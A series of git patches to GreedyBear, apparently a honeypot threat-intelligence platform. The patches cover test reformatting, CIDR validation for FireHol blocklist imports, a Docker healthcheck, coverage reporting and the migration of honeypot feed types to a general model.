+ # Run the cronjob
+ cron = whatsmyip.WhatsMyIPCron()
+ cron.run()
+
+ # Verify the request was made correctly
+ mock_get.assert_called_once()
+ call_args = mock_get.call_args
+ self.assertIn(
+ "https://raw.githubusercontent.com/MISP/misp-warninglists",
+ call_args[0][0],
+ )
+ self.assertEqual(call_args[1]["timeout"], 10)
From 47841e34c2b7963510c6de648362530d22a85418 Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Tue, 20 Jan 2026 11:44:18 +0100
Subject: [PATCH 50/75] fix import order
---
tests/greedybear/cronjobs/test_whatsmyip.py | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/tests/greedybear/cronjobs/test_whatsmyip.py b/tests/greedybear/cronjobs/test_whatsmyip.py
index 51586b13..2900280a 100644
--- a/tests/greedybear/cronjobs/test_whatsmyip.py
+++ b/tests/greedybear/cronjobs/test_whatsmyip.py
@@ -1,11 +1,11 @@
# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
# See the file 'LICENSE' for copying permission.
-from tests import CustomTestCase
-from unittest.mock import patch, MagicMock
+from unittest.mock import MagicMock, patch
from greedybear.cronjobs import whatsmyip
from greedybear.models import IOC, WhatsMyIPDomain
+from tests import CustomTestCase
class WhatsMyIPTestCase(CustomTestCase):
From b56f70c76b7898ab70391925de88eb69f29b5705 Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Tue, 20 Jan 2026 11:57:12 +0100
Subject: [PATCH 51/75] fix formatting
---
tests/greedybear/cronjobs/test_whatsmyip.py | 32 ++++++---------------
1 file changed, 8 insertions(+), 24 deletions(-)
diff --git a/tests/greedybear/cronjobs/test_whatsmyip.py b/tests/greedybear/cronjobs/test_whatsmyip.py
index 2900280a..7a8a3310 100644
--- a/tests/greedybear/cronjobs/test_whatsmyip.py
+++ b/tests/greedybear/cronjobs/test_whatsmyip.py
@@ -16,9 +16,7 @@ def test_add_new_domains(self, mock_get):
"""Test adding new domains from MISP warning list"""
# Mock the HTTP response
mock_response = MagicMock()
- mock_response.json.return_value = {
- "list": ["test-domain-1.com", "test-domain-2.com"]
- }
+ mock_response.json.return_value = {"list": ["test-domain-1.com", "test-domain-2.com"]}
mock_get.return_value = mock_response
# Run the cronjob
@@ -27,12 +25,8 @@ def test_add_new_domains(self, mock_get):
# Verify domains were added
self.assertEqual(WhatsMyIPDomain.objects.count(), 2)
- self.assertTrue(
- WhatsMyIPDomain.objects.filter(domain="test-domain-1.com").exists()
- )
- self.assertTrue(
- WhatsMyIPDomain.objects.filter(domain="test-domain-2.com").exists()
- )
+ self.assertTrue(WhatsMyIPDomain.objects.filter(domain="test-domain-1.com").exists())
+ self.assertTrue(WhatsMyIPDomain.objects.filter(domain="test-domain-2.com").exists())
@patch("greedybear.cronjobs.whatsmyip.requests.get")
def test_skip_existing_domains(self, mock_get):
@@ -42,9 +36,7 @@ def test_skip_existing_domains(self, mock_get):
# Mock the HTTP response with existing and new domains
mock_response = MagicMock()
- mock_response.json.return_value = {
- "list": ["existing-domain.com", "new-domain.com"]
- }
+ mock_response.json.return_value = {"list": ["existing-domain.com", "new-domain.com"]}
mock_get.return_value = mock_response
# Run the cronjob
@@ -53,12 +45,8 @@ def test_skip_existing_domains(self, mock_get):
# Verify only new domain was added
self.assertEqual(WhatsMyIPDomain.objects.count(), 2)
- self.assertEqual(
- WhatsMyIPDomain.objects.get(domain="existing-domain.com").id, existing_domain.id
- )
- self.assertTrue(
- WhatsMyIPDomain.objects.filter(domain="new-domain.com").exists()
- )
+ self.assertEqual(WhatsMyIPDomain.objects.get(domain="existing-domain.com").id, existing_domain.id)
+ self.assertTrue(WhatsMyIPDomain.objects.filter(domain="new-domain.com").exists())
@patch("greedybear.cronjobs.whatsmyip.requests.get")
def test_remove_old_ioc_records(self, mock_get):
@@ -78,9 +66,7 @@ def test_remove_old_ioc_records(self, mock_get):
# Verify IOC record was deleted
self.assertFalse(IOC.objects.filter(id=ioc.id).exists())
- self.assertTrue(
- WhatsMyIPDomain.objects.filter(domain=domain_name).exists()
- )
+ self.assertTrue(WhatsMyIPDomain.objects.filter(domain=domain_name).exists())
@patch("greedybear.cronjobs.whatsmyip.requests.get")
def test_handle_missing_ioc_gracefully(self, mock_get):
@@ -95,9 +81,7 @@ def test_handle_missing_ioc_gracefully(self, mock_get):
cron.run()
# Verify domain was added
- self.assertTrue(
- WhatsMyIPDomain.objects.filter(domain="domain-with-no-ioc.com").exists()
- )
+ self.assertTrue(WhatsMyIPDomain.objects.filter(domain="domain-with-no-ioc.com").exists())
@patch("greedybear.cronjobs.whatsmyip.requests.get")
def test_empty_domain_list(self, mock_get):
From 1a711e6167b4d09201500af454b325f18741b00f Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Tue, 20 Jan 2026 12:00:09 +0100
Subject: [PATCH 52/75] fix formatting
---
tests/test_ntfy.py | 1 +
1 file changed, 1 insertion(+)
diff --git a/tests/test_ntfy.py b/tests/test_ntfy.py
index f7f2dcd2..993a8dff 100644
--- a/tests/test_ntfy.py
+++ b/tests/test_ntfy.py
@@ -10,6 +10,7 @@
"disable_existing_loggers": True,
}
+
@override_settings(LOGGING=TEST_LOGGING)
class SendNtfyMessageTests(CustomTestCase):
@override_settings(NTFY_URL="https://ntfy.sh/greedybear")
From 325e2d2e49eee429aaac5d8fefd4784ea21e980e Mon Sep 17 00:00:00 2001
From: Amisha Chhajed <136238836+amishhaa@users.noreply.github.com>
Date: Tue, 20 Jan 2026 16:33:08 +0530
Subject: [PATCH 53/75] Adding validation methods for cidr and validation for
incoming get requests in Firehol.py. (#711)
* Adding validation methods for cidr and validation for incoming get requests in firehol
* fix merge
* fix extra import
---
greedybear/cronjobs/extraction/utils.py | 19 +++-
greedybear/cronjobs/firehol.py | 7 ++
tests/greedybear/cronjobs/test_firehol.py | 29 ++++++
tests/test_extraction_utils.py | 121 ++++++++++++++++++++++
4 files changed, 175 insertions(+), 1 deletion(-)
diff --git a/greedybear/cronjobs/extraction/utils.py b/greedybear/cronjobs/extraction/utils.py
index 31de9e2d..cb421cc9 100644
--- a/greedybear/cronjobs/extraction/utils.py
+++ b/greedybear/cronjobs/extraction/utils.py
@@ -1,6 +1,6 @@
from collections import defaultdict
from datetime import datetime
-from ipaddress import IPv4Address, ip_address, ip_network
+from ipaddress import IPv4Address, IPv4Network, ip_address, ip_network
from logging import Logger
from urllib.parse import urlparse
@@ -149,6 +149,23 @@ def is_valid_ipv4(candidate: str) -> tuple[bool, str | None]:
return False, None
+def is_valid_cidr(candidate: str) -> tuple[bool, str | None]:
+ """
+ Validate if a string is a valid CIDR notation.
+
+ Args:
+ candidate: String to validate as CIDR.
+
+ Returns:
+ True if valid CIDR, False otherwise.
+ """
+ try:
+ IPv4Network(candidate.strip(), strict=False)
+ return True, candidate.strip()
+ except ValueError:
+ return False, None
+
+
def get_ioc_type(ioc: str) -> str:
"""
Determine the type of an IOC based on its format.
diff --git a/greedybear/cronjobs/firehol.py b/greedybear/cronjobs/firehol.py
index db8c2bcc..b92bff41 100644
--- a/greedybear/cronjobs/firehol.py
+++ b/greedybear/cronjobs/firehol.py
@@ -1,6 +1,7 @@
import requests
from greedybear.cronjobs.base import Cronjob
+from greedybear.cronjobs.extraction.utils import is_valid_cidr, is_valid_ipv4
from greedybear.cronjobs.repositories import FireHolRepository
@@ -54,6 +55,12 @@ def run(self) -> None:
if not line or line.startswith("#"):
continue
+ # Validate the extracted candidate
+ if not (is_valid_ipv4(line)[0] or is_valid_cidr(line)[0]):
+ # Not a valid IPv4 or CIDR, log at DEBUG level
+ self.log.debug(f"Invalid IPv4 address or CIDR in line: {line}")
+ continue
+
# FireHol .ipset and .netset files contain IPs or CIDRs, one per line
# Comments (lines starting with #) are filtered out above
diff --git a/tests/greedybear/cronjobs/test_firehol.py b/tests/greedybear/cronjobs/test_firehol.py
index b4d4a314..7e00a548 100644
--- a/tests/greedybear/cronjobs/test_firehol.py
+++ b/tests/greedybear/cronjobs/test_firehol.py
@@ -133,6 +133,35 @@ def test_run_handles_raise_for_status_errors(self, mock_get):
cronjob.log.error.assert_called()
+ @patch("greedybear.cronjobs.firehol.requests.get")
+ def test_run_handles_invalid_ip(self, mock_get):
+ # Setup mock response
+ mock_response = MagicMock()
+ mock_response.text = "# blocklist_de\n256.1.1.1\n999.999.999.999\n"
+ mock_get.return_value = mock_response
+
+ # Run the cronjob
+ cronjob = FireHolCron()
+ cronjob.log = MagicMock()
+ cronjob.execute()
+
+ self.assertFalse(FireHolList.objects.filter(ip_address="256.1.1.1", source="blocklist_de").exists())
+ self.assertFalse(FireHolList.objects.filter(ip_address="999.999.999.999", source="blocklist_de").exists())
+
+ @patch("greedybear.cronjobs.firehol.requests.get")
+ def test_run_handles_invalid_cidr(self, mock_get):
+ # Setup mock response
+ mock_response = MagicMock()
+ mock_response.text = "# blocklist_de\n192.168.1.256/24\n"
+ mock_get.return_value = mock_response
+
+ # Run the cronjob
+ cronjob = FireHolCron()
+ cronjob.log = MagicMock()
+ cronjob.execute()
+
+ self.assertFalse(FireHolList.objects.filter(ip_address="192.168.1.256", source="blocklist_de").exists())
+
def test_cleanup_old_entries(self):
now = datetime.now()
diff --git a/tests/test_extraction_utils.py b/tests/test_extraction_utils.py
index 200794d7..7c6f56ea 100644
--- a/tests/test_extraction_utils.py
+++ b/tests/test_extraction_utils.py
@@ -6,6 +6,7 @@
correct_ip_reputation,
get_ioc_type,
iocs_from_hits,
+ is_valid_cidr,
is_valid_ipv4,
is_whatsmyip_domain,
threatfox_submission,
@@ -163,6 +164,126 @@ def test_invalid_ipv4_negative_numbers(self):
self.assertIsNone(ip)
+class TestIsValidCIDR(CustomTestCase):
+ def test_valid_cidr_returns_true_and_cleaned_cidr(self):
+ is_valid, cidr = is_valid_cidr("192.168.1.0/24")
+ self.assertTrue(is_valid)
+ self.assertEqual(cidr, "192.168.1.0/24")
+
+ def test_valid_cidr_edge_cases(self):
+ is_valid, cidr = is_valid_cidr("0.0.0.0/0")
+ self.assertTrue(is_valid)
+ self.assertEqual(cidr, "0.0.0.0/0")
+
+ is_valid, cidr = is_valid_cidr("255.255.255.255/32")
+ self.assertTrue(is_valid)
+ self.assertEqual(cidr, "255.255.255.255/32")
+
+ is_valid, cidr = is_valid_cidr("10.0.0.0/8")
+ self.assertTrue(is_valid)
+ self.assertEqual(cidr, "10.0.0.0/8")
+
+ def test_cidr_with_whitespace_strips_and_validates(self):
+ is_valid, cidr = is_valid_cidr(" 192.168.1.0/24")
+ self.assertTrue(is_valid)
+ self.assertEqual(cidr, "192.168.1.0/24")
+
+ is_valid, cidr = is_valid_cidr("192.168.1.0/24 ")
+ self.assertTrue(is_valid)
+ self.assertEqual(cidr, "192.168.1.0/24")
+
+ is_valid, cidr = is_valid_cidr(" 192.168.1.0/24 ")
+ self.assertTrue(is_valid)
+ self.assertEqual(cidr, "192.168.1.0/24")
+
+ def test_invalid_cidr_out_of_range_octets(self):
+ invalid = [
+ "256.1.1.0/24",
+ "1.256.1.0/24",
+ "1.1.256.0/24",
+ "999.999.999.999/24",
+ ]
+
+ for value in invalid:
+ is_valid, cidr = is_valid_cidr(value)
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+ def test_invalid_cidr_incomplete_format(self):
+ invalid = [
+ "192.168.1/24",
+ "192.168/24",
+ "192/24",
+ "/24",
+ ]
+
+ for value in invalid:
+ is_valid, cidr = is_valid_cidr(value)
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+ def test_invalid_cidr_too_many_octets(self):
+ is_valid, cidr = is_valid_cidr("1.2.3.4.5/24")
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+ def test_invalid_cidr_domains(self):
+ is_valid, cidr = is_valid_cidr("example.com/24")
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+ is_valid, cidr = is_valid_cidr("sub.example.com/16")
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+ def test_invalid_cidr_ipv6_addresses(self):
+ is_valid, cidr = is_valid_cidr("2001:db8::/32")
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+ is_valid, cidr = is_valid_cidr("::1/128")
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+ def test_invalid_cidr_random_strings(self):
+ is_valid, cidr = is_valid_cidr("/w00tw00t.at.ISC.SANS.DFind:)")
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+ is_valid, cidr = is_valid_cidr("not a cidr")
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+ is_valid, cidr = is_valid_cidr("")
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+ def test_invalid_cidr_special_characters(self):
+ is_valid, cidr = is_valid_cidr("192.168.1.0/24#comment")
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+ is_valid, cidr = is_valid_cidr("192.168.1.0/24 # comment")
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+ is_valid, cidr = is_valid_cidr("10.0.0.0/8 some text")
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+ def test_invalid_cidr_negative_numbers(self):
+ invalid = [
+ "-1.1.1.1/24",
+ "192.168.1.0/-1",
+ "192.168.1.0/33",
+ ]
+
+ for value in invalid:
+ is_valid, cidr = is_valid_cidr(value)
+ self.assertFalse(is_valid)
+ self.assertIsNone(cidr)
+
+
class TestIsWhatsmyipDomain(CustomTestCase):
def test_returns_true_for_known_domain(self):
WhatsMyIPDomain.objects.create(domain="some.domain.com")
From ca3610919fc4c206c0d00a6b1c2b88e96c0fbea4 Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Tue, 20 Jan 2026 14:35:07 +0100
Subject: [PATCH 54/75] Make CI trigger backend tests and ruff checks in PRs if
only tests are involved
---
.github/workflows/pull_request_automation.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.github/workflows/pull_request_automation.yml b/.github/workflows/pull_request_automation.yml
index 0f85421e..e6b60b06 100644
--- a/.github/workflows/pull_request_automation.yml
+++ b/.github/workflows/pull_request_automation.yml
@@ -15,7 +15,7 @@ jobs:
detect-changes:
uses: ./.github/workflows/_detect_changes.yml
with:
- backend_directories: api greedybear
+ backend_directories: api greedybear tests
frontend_directories: frontend
ubuntu_version: latest
From ab4c611158d9510bf2a0832d598d081ee3f53349 Mon Sep 17 00:00:00 2001
From: Shivraj Suman <79820642+shivraj1182@users.noreply.github.com>
Date: Wed, 21 Jan 2026 12:23:46 +0530
Subject: [PATCH 55/75] Start RabbitMQ first and make Celery wait until healthy
(#722)
Co-authored-by: Shivraj Suman
---
docker/default.yml | 27 +++++++++++++++++++--------
1 file changed, 19 insertions(+), 8 deletions(-)
diff --git a/docker/default.yml b/docker/default.yml
index 0907c88d..f38b1d31 100644
--- a/docker/default.yml
+++ b/docker/default.yml
@@ -52,6 +52,12 @@ services:
driver: none
depends_on:
- postgres
+ healthcheck:
+ test: ["CMD", "rabbitmq-diagnostics", "check_running"]
+ interval: 10s
+ timeout: 5s
+ retries: 10
+ start_period: 10s
celery_beat:
image: intelowlproject/greedybear:prod
@@ -63,9 +69,12 @@ services:
env_file:
- env_file
depends_on:
- - rabbitmq
- - postgres
- - uwsgi
+ rabbitmq:
+ condition: service_healthy
+ postgres:
+ condition: service_started
+ uwsgi:
+ condition: service_started
<<: *no-healthcheck
celery_worker_default:
@@ -80,15 +89,17 @@ services:
env_file:
- env_file
depends_on:
- - rabbitmq
- - postgres
- - uwsgi
+ rabbitmq:
+ condition: service_healthy
+ postgres:
+ condition: service_started
+ uwsgi:
+ condition: service_started
<<: *no-healthcheck
-
volumes:
postgres_data:
nginx_logs:
generic_logs:
static_content:
- mlmodels:
+ mlmodels:
\ No newline at end of file
From ac6f290aceedeff66aabc03f5591f2cb9b208ac8 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Wed, 21 Jan 2026 08:00:09 +0100
Subject: [PATCH 56/75] Bump datasketch from 1.8.0 to 1.9.0 in /requirements
(#724)
Bumps [datasketch](https://github.com/ekzhu/datasketch) from 1.8.0 to 1.9.0.
- [Release notes](https://github.com/ekzhu/datasketch/releases)
- [Commits](https://github.com/ekzhu/datasketch/compare/v1.8.0...v1.9.0)
---
updated-dependencies:
- dependency-name: datasketch
dependency-version: 1.9.0
dependency-type: direct:production
update-type: version-update:semver-minor
...
Signed-off-by: dependabot[bot]
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
requirements/project-requirements.txt | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 7b401e32..27a45d8f 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -20,4 +20,4 @@ joblib==1.5.3
pandas==2.3.3
scikit-learn==1.8.0
numpy==2.4.1
-datasketch==1.8.0
+datasketch==1.9.0
From 70ef3109c7ae3ed995f4207e10c703a6745460ce Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Wed, 21 Jan 2026 18:56:33 +0530
Subject: [PATCH 57/75] feat: Add test coverage reporting. Closes #701 (#712)
* feat: Add test coverage reporting (#701)
- Add .coveragerc configuration file
- Define source paths (greedybear/)
- Exclude migrations, tests, and generated files
- Configure report formatting (show_missing, precision)
- Set output formats for HTML and XML reports
- Update CI workflow to generate coverage artifacts
- Generate XML coverage report for download
- Upload coverage reports as GitHub Actions artifacts
- Add coverage summary to job summary for quick visibility
- Set 30-day retention for coverage artifacts
- Update .gitignore to exclude coverage artifacts
- htmlcov/, .coverage, coverage.xml, etc.
This implements Phase 1 (Local Coverage Setup) and Phase 2 (CI Integration)
as discussed in issue #701. Coverage is already enabled in the CI workflow
and will now generate detailed reports.
Local usage:
coverage run --source=greedybear manage.py test tests
coverage report # Terminal output
coverage html # Browser-viewable report in htmlcov/
Related: #701
* feat: Auto-install coverage in local development
- Add coverage auto-installation to local.override.yml
- Coverage is now automatically installed when running docker compose
- Developers no longer need to manually 'pip install coverage'
- Add requirements/test.txt for non-Docker environments
- Provides easy installation: pip install -r requirements/test.txt
- Documents test dependencies
This implements Option 4 as approved by @mlodic.
Related: #701
* fix: Correct regex pattern in .coveragerc
- Fixed if __name__ == __main__ pattern
- Changed from dots (.__main__.:) to proper quotes ("__main__":)
- Copilot suggestion applied
Co-authored-by: GitHub Copilot
* fix: Upload only coverage.xml artifact
- Removed .coverage file from artifact upload
- Prevents overwrites between different Python versions in matrix
- XML report is sufficient for coverage analysis
- Binary .coverage files are version-specific
Co-authored-by: GitHub Copilot
* feat: Add dev-requirements.txt with conditional Dockerfile install
Implements Option B as approved by @mlodic:
- Create requirements/dev-requirements.txt with coverage>=7.3.2
- Add INSTALL_DEV build argument to Dockerfile
- Update local.override.yml to use INSTALL_DEV=true
- Remove requirements/test.txt (replaced by dev-requirements.txt)
Benefits:
- Dependabot tracks dev dependencies automatically
- Clean separation between dev and production
- Production image stays lean (no coverage)
- Dev dependencies installed at build time, not runtime
Usage:
docker compose up --build # Local dev (includes coverage)
docker build . # Production (no dev deps)
Related: #701
* fix: Replace periods with hyphens in artifact name
- Artifact name 'coverage-report-3.13' becomes 'coverage-report-3-13'
- Prevents GitHub Actions naming conflicts with periods
Co-authored-by: GitHub Copilot
* fix: Use valid GitHub Actions expression for artifact name
* chore: Trigger CI with temporary debug log
* Revert "chore: Trigger CI with temporary debug log"
This reverts commit a7aa9412451558da8eb1b34ae2c2a4ddfd1d166f.
---
.coveragerc | 32 +++++++++++++++++++++++++++++++
.github/workflows/_python.yml | 15 +++++++++++++++
.gitignore | 6 ++++++
docker/Dockerfile | 7 +++++++
docker/local.override.yml | 1 +
requirements/dev-requirements.txt | 4 ++++
6 files changed, 65 insertions(+)
create mode 100644 .coveragerc
create mode 100644 requirements/dev-requirements.txt
diff --git a/.coveragerc b/.coveragerc
new file mode 100644
index 00000000..8a29f2a6
--- /dev/null
+++ b/.coveragerc
@@ -0,0 +1,32 @@
+[run]
+source = greedybear
+omit =
+ */migrations/*
+ */tests/*
+ */test_*.py
+ */__pycache__/*
+ */venv/*
+ */env/*
+ manage.py
+ greedybear/settings.py
+ greedybear/wsgi.py
+
+[report]
+show_missing = True
+precision = 2
+skip_covered = False
+skip_empty = True
+exclude_lines =
+ pragma: no cover
+ def __repr__
+ def __str__
+ raise AssertionError
+ raise NotImplementedError
+ if __name__ == "__main__":
+ @(abc\.)?abstractmethod
+
+[html]
+directory = htmlcov
+
+[xml]
+output = coverage.xml
diff --git a/.github/workflows/_python.yml b/.github/workflows/_python.yml
index 8c5c39f4..044b163c 100644
--- a/.github/workflows/_python.yml
+++ b/.github/workflows/_python.yml
@@ -543,6 +543,7 @@ jobs:
env: ${{ secrets }}
shell: bash
+
- name: Create coverage output
if: inputs.use_coverage && inputs.upload_coverage
id: coverage-output
@@ -551,3 +552,17 @@ jobs:
echo "## Coverage.py report" >> $GITHUB_STEP_SUMMARY
echo "$(coverage report -m --format=markdown)" >> $GITHUB_STEP_SUMMARY
working-directory: ${{ inputs.working_directory }}
+
+ - name: Generate coverage XML
+ if: inputs.use_coverage && inputs.upload_coverage
+ run: |
+ coverage xml
+ working-directory: ${{ inputs.working_directory }}
+
+ - name: Upload coverage report as artifact
+ if: inputs.use_coverage && inputs.upload_coverage
+ uses: actions/upload-artifact@v4
+ with:
+ name: coverage-report-py${{ matrix.python_version }}
+ path: ${{ inputs.working_directory }}/coverage.xml
+ retention-days: 30
diff --git a/.gitignore b/.gitignore
index 9e56261b..3d05fec9 100644
--- a/.gitignore
+++ b/.gitignore
@@ -9,4 +9,10 @@ mlmodels/
.idea/
# Ruff cache
.ruff_cache/
+# Coverage reports
+htmlcov/
+.coverage
+coverage.xml
+*.cover
+.coverage.*
diff --git a/docker/Dockerfile b/docker/Dockerfile
index a4dee9aa..c98f60c2 100644
--- a/docker/Dockerfile
+++ b/docker/Dockerfile
@@ -31,9 +31,16 @@ RUN mkdir -p ${LOG_PATH} \
&& pip3 install --no-cache-dir --upgrade pip
COPY requirements/project-requirements.txt $PYTHONPATH/project-requirements.txt
+COPY requirements/dev-requirements.txt $PYTHONPATH/dev-requirements.txt
WORKDIR $PYTHONPATH
RUN pip3 install --no-cache-dir -r $PYTHONPATH/project-requirements.txt
+# Conditionally install dev requirements (coverage, etc.)
+ARG INSTALL_DEV=false
+RUN if [ "$INSTALL_DEV" = "true" ]; then \
+ pip3 install --no-cache-dir -r $PYTHONPATH/dev-requirements.txt; \
+ fi
+
COPY . $PYTHONPATH
COPY --from=frontend-build /build /var/www/reactapp
diff --git a/docker/local.override.yml b/docker/local.override.yml
index 46c616c0..426b6534 100644
--- a/docker/local.override.yml
+++ b/docker/local.override.yml
@@ -5,6 +5,7 @@ services:
dockerfile: docker/Dockerfile
args:
WATCHMAN: "true"
+ INSTALL_DEV: "true"
image: intelowlproject/greedybear:test
volumes:
- ../:/opt/deploy/greedybear
diff --git a/requirements/dev-requirements.txt b/requirements/dev-requirements.txt
new file mode 100644
index 00000000..3cf3908d
--- /dev/null
+++ b/requirements/dev-requirements.txt
@@ -0,0 +1,4 @@
+# Development requirements
+# Installed conditionally in Docker: INSTALL_DEV=true
+# For manual installation: pip install -r requirements/dev-requirements.txt
+coverage>=7.3.2
From 7c377b283bd3009553f9bfcdedd884a9a8030567 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Thu, 22 Jan 2026 21:59:25 +0530
Subject: [PATCH 58/75] Remove hardcoded Cowrie and Log4pot fields from IOC
model. Closes #637 (#725)
* Refactor: Remove hardcoded Cowrie and Log4j fields from IOC model
- Migrated existing data to GeneralHoneypot M2M relationship
- Removed boolean fields from IOC model
- Updated repositories and extraction strategies to use GeneralHoneypot
- Cleaned up API views and removed legacy Enums
- Updated frontend to dynamically load honeypots
- Added comprehensive tests for feed types and backward compatibility
* Fix frontend tests: update useDataTable mock
* Fix frontend linting issues in Feeds.jsx
* refactor: address review comments
- Remove legacy log4j alias and normalization logic
- Simplify queries by removing Q() wrappers
- Use list comprehensions for cleaner code
- Update tests to use log4pot instead of log4j
- Verify general_honeypot_name in extraction tests
---------
Co-authored-by: tim <46972822+regulartim@users.noreply.github.com>
---
.github/workflows/_node.yml | 4 +
api/enums.py | 6 -
api/views/statistics.py | 14 +-
api/views/utils.py | 29 ++--
frontend/src/components/feeds/Feeds.jsx | 6 +-
.../tests/components/feeds/Feeds.test.jsx | 9 +-
greedybear/admin.py | 4 -
.../cronjobs/extraction/strategies/cowrie.py | 9 +-
.../cronjobs/extraction/strategies/log4pot.py | 10 +-
greedybear/cronjobs/extraction/utils.py | 8 +-
greedybear/cronjobs/repositories/ioc.py | 10 +-
.../migrations/0030_migrate_cowrie_log4j.py | 41 +++++
.../0031_remove_cowrie_log4j_fields.py | 18 ++
greedybear/models.py | 2 -
tests/__init__.py | 20 ++-
tests/api/test_feed_types.py | 156 ++++++++++++++++++
.../cronjobs/test_monitor_honeypots.py | 16 +-
tests/test_cowrie_extraction.py | 9 +-
tests/test_extraction_utils.py | 25 +--
tests/test_ioc_repository.py | 55 ++++--
tests/test_models.py | 5 +-
tests/test_scoring_utils.py | 4 +-
tests/test_serializers.py | 8 +-
tests/test_views.py | 33 ++--
24 files changed, 362 insertions(+), 139 deletions(-)
delete mode 100644 api/enums.py
create mode 100644 greedybear/migrations/0030_migrate_cowrie_log4j.py
create mode 100644 greedybear/migrations/0031_remove_cowrie_log4j_fields.py
create mode 100644 tests/api/test_feed_types.py
diff --git a/.github/workflows/_node.yml b/.github/workflows/_node.yml
index 074bbe15..a164c844 100644
--- a/.github/workflows/_node.yml
+++ b/.github/workflows/_node.yml
@@ -82,6 +82,10 @@ jobs:
node:
name: Run node.js tests
runs-on: ubuntu-${{ inputs.ubuntu_version }}
+ permissions:
+ actions: read
+ contents: read
+ security-events: write
timeout-minutes: ${{ inputs.max_timeout }}
strategy:
matrix:
diff --git a/api/enums.py b/api/enums.py
deleted file mode 100644
index a4a536dc..00000000
--- a/api/enums.py
+++ /dev/null
@@ -1,6 +0,0 @@
-import enum
-
-
-class Honeypots(enum.Enum):
- LOG4J = "log4j"
- COWRIE = "cowrie"
diff --git a/api/views/statistics.py b/api/views/statistics.py
index 65eb9188..347dfa1a 100644
--- a/api/views/statistics.py
+++ b/api/views/statistics.py
@@ -80,8 +80,7 @@ def enrichment(self, request, pk=None):
@action(detail=False, methods=["get"])
def feeds_types(self, request):
"""
- Retrieve statistics for different types of feeds, including Log4j, Cowrie,
- and general honeypots.
+ Retrieve statistics for different types of feeds using GeneralHoneypot M2M relationship.
Args:
request: The incoming request object.
@@ -89,15 +88,12 @@ def feeds_types(self, request):
Returns:
Response: A JSON response containing the feed type statistics.
"""
- # FEEDS
- annotations = {
- "Log4j": Count("name", distinct=True, filter=Q(log4j=True)),
- "Cowrie": Count("name", distinct=True, filter=Q(cowrie=True)),
- }
- # feed_type for each general honeypot in the list
+ # Build annotations for each active general honeypot
+ annotations = {}
general_honeypots = GeneralHoneypot.objects.all().filter(active=True)
for hp in general_honeypots:
- annotations[hp.name] = Count("name", Q(general_honeypot__name__iexact=hp.name.lower()))
+ # Use M2M relationship instead of boolean fields
+ annotations[hp.name] = Count("name", distinct=True, filter=Q(general_honeypot__name__iexact=hp.name))
return self.__aggregation_response_static_ioc(annotations)
def __aggregation_response_static_statistics(self, annotations: dict) -> Response:
diff --git a/api/views/utils.py b/api/views/utils.py
index 87face9d..cded1e9b 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -8,12 +8,11 @@
from django.conf import settings
from django.contrib.postgres.aggregates import ArrayAgg
-from django.db.models import F, Q
+from django.db.models import F
from django.http import HttpResponse, HttpResponseBadRequest, StreamingHttpResponse
from rest_framework import status
from rest_framework.response import Response
-from api.enums import Honeypots
from api.serializers import FeedsRequestSerializer
from greedybear.models import IOC, GeneralHoneypot, Statistics
@@ -117,8 +116,9 @@ def get_valid_feed_types() -> frozenset[str]:
Returns:
frozenset[str]: An immutable set of valid feed type strings
"""
- general_honeypots = GeneralHoneypot.objects.all().filter(active=True)
- return frozenset([Honeypots.LOG4J.value, Honeypots.COWRIE.value, "all"] + [hp.name.lower() for hp in general_honeypots])
+ general_honeypots = GeneralHoneypot.objects.filter(active=True)
+ feed_types = ["all"] + [hp.name.lower() for hp in general_honeypots]
+ return frozenset(feed_types)
def get_queryset(request, feed_params, valid_feed_types):
@@ -147,11 +147,7 @@ def get_queryset(request, feed_params, valid_feed_types):
query_dict = {}
if feed_params.feed_type != "all":
- if feed_params.feed_type in (Honeypots.LOG4J.value, Honeypots.COWRIE.value):
- query_dict[feed_params.feed_type] = True
- else:
- # accept feed_type if it is in the general honeypots list
- query_dict["general_honeypot__name__iexact"] = feed_params.feed_type
+ query_dict["general_honeypot__name__iexact"] = feed_params.feed_type
if feed_params.attack_type != "all":
query_dict[feed_params.attack_type] = True
@@ -167,10 +163,11 @@ def get_queryset(request, feed_params, valid_feed_types):
iocs = (
IOC.objects.filter(**query_dict)
- .filter(Q(cowrie=True) | Q(log4j=True) | Q(general_honeypot__active=True))
+ .filter(general_honeypot__active=True)
.exclude(ip_reputation__in=feed_params.exclude_reputation)
.annotate(value=F("name"))
.annotate(honeypots=ArrayAgg("general_honeypot__name"))
+ .distinct()
.order_by(feed_params.ordering)[: int(feed_params.feed_size)]
)
